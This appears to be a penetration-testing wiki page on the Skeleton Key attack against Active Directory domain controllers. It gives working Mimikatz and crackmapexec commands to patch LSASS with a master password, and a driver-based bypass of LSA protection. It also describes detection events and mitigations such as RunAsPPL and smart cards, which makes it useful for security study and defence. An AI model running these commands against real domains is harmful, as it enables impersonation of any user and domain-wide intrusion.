Skeleton Key Attack
Last updated
Last updated
The Skeleton Key attack is malware that can be injected into the LSASS process on a Domain Controller and creates a master password that will hijack [sic] any authentication request on the domain and allow an attacker to log in as any user on any system on the domain with the same password.
Attacker must have obtained Domain Admin rights
Mimikatz running on a Domain Controller
For most effective use all Domain Controllers will need to be exploited however, this is not a hard requirement
Rebooting a Domain Controller will remove the malware
After Mimikatz has been dropped onto a Domain Controller and executed with Domain Admin privileges the following simple command can be used to perform the exploit.
With the above confirming the Lsass.exe process being successfully patched the password mimikatz can be used to authenticate as any user in the domain.
RDP can be used to authenticate against the Skeleton Key to access high level accounts from a GUI. Below we can access the CEO's desktop directly.
With valid Domain Admin credentials crackmapexec can be used to inject the Mimikatz module and Skeleton key command directly to a target Domain Controller.
Edit the registry to the following:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe.
Set the value of the registry key to AuditLevel=dword:00000008.
Restart the system
Expand Computer Configuration, expand Preferences, and then expand Windows Settings.
Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears.
In the Hive list, click HKEY_LOCAL_MACHINE.
In the Key Path list, browse to SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe.
In the Value name box, type AuditLevel.
In the Value type box, click to select the REG_DWORD.
In the Value data box, type 00000008.
Click OK.
After making required changes the event logs on appropriate systems can be monitored for plug-ins and drivers loaded by lsass.exe
Analyze the results of Event 3033 and Event 3063.
After this, you may see these events in Event Viewer: Microsoft-Windows-Codeintegrity/Operational:
Event 3033: This event records that a code integrity check determined that a process (usually lsass.exe) attempted to load a driver that did not meet the Microsoft signing level requirements.
Event 3063: This event records that a code integrity check determined that a process (usually lsass.exe) attempted to load a driver that did not meet the security requirements for Shared Sections.
LSASS can be run in protected mode which may help to prevent this kind of attack. Enabling protected mode ensures any alterations to the LSASS process must be signed by a verified Microsoft signature. A caveat to this is if malware is able to load into the kernel the protection would be nullified.
Perform the follow registry changes to enable LSA protection:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa.
Set the value of the registry key to: "RunAsPPL"=dword:00000001.
Restart the computer.
LSA plug-ins which are NOT compatible with LSA Protection Mode will NOT function after enabling the mode.
To check if LSA Protection is enabled we can check for Event ID 12 from Wininit under the System logs in Event Viewer.
Skeleton key attacks use single authentication on the network for the post exploitation stage. Multi-factor implementations such as a smart card authentication can help to mitigate this attack.
Application whitelisting can be utilized to stop unapproved applications being executed on the Domain Controller. AppLocker** **would be an appropriate solution in this circumstance.
Ensuring Domain admin accounts are not compromised would mitigate this attack as Domain Admin privileges are a hard requirement to perform a skeleton key attack
The below image represents an attempt to access the lsass.exe process and extract clear text passwords and run a skeleton key attack. As we can see this has not been successful since applying the registry key change mentioned in the mitigation section for LSA Protection.
We can check if the LSA Protection RunAsPPL key exists by querying the registry to confirm the LSA protection is in place.
This can be bypassed however by utilizing the mimidrv.sys driver file which is included as a separate file with mimikatz.
The driver can be loaded by running the command !+ in Mimikatz. After doing so the follow command can be execute to protect the mimikatz.exe process.
The same command with the /remove flag can be used to strip the process protection from a process such as lsass.exe
After doing so it is possible to bypass the LSA protection as shown below where the command misc::skeleton is performed and successfully completes.
xfreerdp /v:<IP> /u:<User> /p:<mimikatz> /d:<Domain> #Syntax
xfreerdp /v:10.10.10.9 /u:CEO /p:mimikatz /d:security.localnet use <DriveLetter:> \\<IP>\<Share> /user:<User> mimikatz #Syntax
net use Z: \\10.10.10.9\ADMIN$ /user:Administrator mimikatzcrackmapexec smb 10.10.10.10 -u 'Administrator' -p 'Password123!' -M mimikatz -o COMMAND='misc::skeleton'reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "RunAsPPL"
# Value 0x1 means LSA Protection is enabled!processProtect /process:mimikatz.exe!processprotect /process:lsass.exe /removeprivilege::debug #Check for '20' OK debug rights.
misc::skeleton
